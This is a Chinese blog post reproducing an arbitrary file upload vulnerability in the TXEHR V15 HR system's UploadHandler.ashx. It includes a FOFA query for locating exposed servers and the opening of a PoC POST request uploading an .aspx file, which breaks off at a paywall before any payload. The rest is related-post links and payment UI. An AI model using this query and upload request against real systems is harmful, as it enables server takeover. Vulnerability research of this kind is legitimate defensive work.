同享人力资源管理系统-TXEHR V15 UploadHandler.ashx 任意文件上传漏洞复现

已于 2024-08-05 10:37:46 修改
阅读量118 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-08-02 21:12:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/140880337
版权

0x01 产品简介

同享人力资源管理系统(TXEHR V15)是一款专为现代企业设计的人力资源管理软件解决方案,旨在通过先进的信息化手段提升企业人力资源管理的效率与水平。该系统集成了组织人事、考勤管理、薪资核算、招聘配置、培训发展、绩效管理等核心模块,并提供了灵活的配置选项和强大的数据分析能力,以满足不同企业规模和行业特性的需求。

0x02 漏洞概述

同享人力资源管理系统-TXEHR V15 UploadHandler.ashx 接口处存在任意文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

0x03 复现环境

FOFA:body="/Assistant/Default.aspx"

0x04 漏洞复现 

PoC

POST /Handler/UploadHandler.ashx?folder=Uploadfile2 HTTP/1.1
Host: 
accept: */*
Content-Type: multipart/form-data;boundary =---------------------------142851345723692939351758052805
Connection: close

-----------------------------142851345723692939351758052805
Content-Disposition: form-data; name="Filedata"; filename="qwe.aspx"
Co
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
同享人力资源管理系统-TXEHR V15 DownloadTemplate 文件读取漏洞复现
0xSec
07-11 516
同享人力资源管理系统-TXEHR V15 DownloadTemplate.asmx 接口处存在文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
方天云智慧平台系统 Upload.ashx 任意文件上传漏洞复现
0xSec
07-31 646
方天云智慧平台系统 Upload.ashx 接口处存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
漏洞复现同享人力资源管理系统-TXEHR V15 DownloadTemplate 文件读取漏洞
qq_39894062的博客
07-17 427
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
同享TXEHR V15人力管理平台DownloadFile接口任意文件下载漏洞复现 [附POC]
薛定谔嘚喵博客
07-11 158
同享TXEHR V15人力管理管理平台DownloadFile存在任意文件下载漏洞
用友U8 CRM swfupload 任意文件上传漏洞复现(XVE-2024-8597)
qq_39894062的博客
04-20 731
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
HW漏洞威胁情报第九天|HW情报
weixin_43167326的博客
08-02 488
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
漏洞复现同享人力资源管理系统-TXEHR V15 DownloadTemplate 文件读取漏洞
siu~
07-16 420
同享人力资源管理系统-TXEHR V15 DownloadTemplate.asmx 接口处存在文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
漏洞复现同享人力资源管理系统-TXEHR V15 UploadHandler.ashx 任意文件上传漏洞
最新发布
siu~
08-07 529
同享人力资源管理系统-TXEHR V15 UploadHandler.ashx 接口处存在任意文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
TIA博途-积分运算库文件SCL算法-V15版本.zip
12-13
在工业自动化领域,西门子的TIA博途( Totally Integrated Automation Portal)是一个全面的工程软件平台,用于设计、编程、模拟和维护自动化系统。V15版本是TIA博途的一个更新,提供了更多功能和优化,以适应不断...
同享人力资源管理软件
08-21
东莞市同享软件科技有限公司成立于1997年,专注于人力资源管理系统16年.
TIA博途-冒泡排序SCL算法-全局FC库文件-V15版本.zip
01-02
在本文中,我们将深入探讨TIA博途中的冒泡排序SCL算法以及如何在全局FC(功能块)库文件中实现这一算法。TIA博途是西门子的一款集成自动化软件,广泛应用于PLC(可编程逻辑控制器)编程,而SCL是一种高级编程语言,...
S7-1200 PLC MODBUS通信轮询库文件V15版本.rar
11-06
《S7-1200 PLC MODBUS通信轮询库文件V15版本详解》 在工业自动化领域,SIMATIC S7-1200 PLC(可编程逻辑控制器)是西门子推出的一款高效、紧凑型的控制器,常用于中小型自动化系统。而MODBUS通信协议则是工业控制...
TIA博途-整数拆分到字节数组中-全局FC库文件-V15版本.zip
12-01
在工业自动化领域,西门子的TIA博途( Totally Integrated Automation Portal)是一个全面的工程软件平台,用于设计、编程、模拟和维护自动化系统。在这个V15版本中,我们聚焦于一个特定的功能:将整数拆分到字节...
instantclient-basic-windows.x64-11.2.0.4.0.zip
05-27
Navicat v15连接oracle报错:ORA-28547: connection to server failed, probable Oracle Net admin error; instantclient-basic-windows.x64-11.2.0.4.0.zip; 最少分; 不吃亏; 不上当;
HW漏洞威胁情报第七天|HW情报
weixin_43167326的博客
07-31 901
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
赛蓝企业管理系统 AuthToken/Index 身份认证绕过漏洞复现
0xSec
08-03 429
赛蓝企业管理系统 AuthToken/Index 接口存在身份认证绕过漏洞,未授权的远程攻击者可以利用此接口构造token绕过身份认证,使用超级管理员账户登录系统后台,造成信息泄露或者恶意破坏,使系统处于极不安全的状态。
域名安全详解
TechEnthusiast的博客
08-06 62
域名安全是网络安全的重要组成部分,涉及多个方面。
\node_modules\@vue\vue-loader-v15\lib\index.js
11-25
根据提供的引用内容,可以看出您遇到了Vue项目中的一个常见问题,即在使用Vue-loader 15及以上版本时需要安装VueLoaderPlugin插件。而`\node_modules\@vue\vue-loader-v15\lib\index.js`是Vue-loader 15的核心文件之一,它负责将Vue组件转换为JavaScript模块。如果您的Vue项目中缺少该文件,可能会导致Vue组件无法正确编译和加载。 如果您遇到了类似的问题,可以按照以下步骤解决: 1. 确保您的Vue项目中已经安装了Vue-loader和Vue-template-compiler,可以使用以下命令进行安装: ``` npm install vue-loader vue-template-compiler --save-dev ``` 2. 在webpack配置文件中添加VueLoaderPlugin插件,例如: ```javascript const VueLoaderPlugin = require('vue-loader/lib/plugin') module.exports = { // ... plugins: [ // ... new VueLoaderPlugin() ] } ``` 3. 确保您的webpack配置文件中正确配置了Vue-loader,例如: ```javascript module.exports = { // ... module: { rules: [ // ... { test: /\.vue$/, loader: 'vue-loader' } ] } } ``` 4. 如果您的Vue项目中仍然出现类似的错误,可以尝试升级Vue-loader和Vue-template-compiler的版本,或者检查您的webpack配置文件是否正确。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值